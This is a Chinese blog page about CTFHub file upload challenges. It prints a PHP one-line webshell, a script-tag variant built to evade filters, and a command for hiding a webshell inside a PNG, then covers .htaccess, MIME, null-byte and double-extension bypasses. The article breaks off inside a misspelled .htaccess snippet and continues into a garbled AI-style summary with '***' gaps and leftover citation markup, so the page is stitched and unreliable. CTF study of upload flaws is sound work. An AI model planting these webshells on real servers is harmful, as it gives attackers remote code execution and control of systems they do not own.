ctfhub 文件上传

本文详细介绍了CTF中常见的文件上传漏洞利用技术,包括一句话木马、.htaccess文件利用、MIME类型绕过、00截断和双写绕过等方法。通过实例演示了如何在各种验证机制下成功上传恶意文件,并利用蚁剑等工具获取服务器权限。

目录

基础知识

一句话木马

绕过过滤php头的木马

图片马的制作

.htaccess

无验证:

前端验证:

.htaccess

方法一:

方法二:

MIME绕过

00截断

限制条件

绕过姿势

双写绕过

文件头检查


基础知识

一句话木马

<?php
@eval($_POST['hack'])
?>

绕过过滤php头的木马

<script language="php">@eval($_POST['pass'])</script>

图片马的制作

首先准备一个比较小的png文件(可以用画图画一个),然后有个php小马

命令如下:

copy 1.png/a+1.php/b 2.png

.htaccess

[htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能]()

简单来说,就是我们上传一个.htaccess文件到服务器,然后服务器之后会将特定格式的文件以php格式解析。

版本一:
<FilesMath  ".jpg">
文件上传是一种将文件从客户端上传到服务器的过程。在CTFHUB中,文件上传可以用来绕过安全限制并获取敏感信息。有几种常见的方法可以进行文件上传,包括.htaccess上传、.php木马文件上传和文件名后缀双写绕过。 在.htaccess上传方法中,首先上传.htaccess文件,然后上传的文件都会解析为php文件。可以将一个.php文件改成.png文件上传,并返回上传成功的路径。可以使用蚁剑等工具连接服务器,并获取flag。这种方法可以绕过MIME类型限制。 另一种方法是直接上传.php木马文件,由于没有任何限制,可以直接上传成功,并显示上传文件的相对路径。同样可以使用蚁剑等工具连接服务器,***例如将上传文件的后缀改为phphpp,上传成功后可以返回路径。如果发现文件后缀是hpp,则需要重新更改后缀再次上传。同样可以使用蚁剑等工具连接服务器,并获取flag。这种方法可以绕过后缀限制。 总结来说,CTFHUB文件上传可以***连接服务器,并获得flag。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFHub_文件上传](https://blog.youkuaiyun.com/weixin_47443077/article/details/119453421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值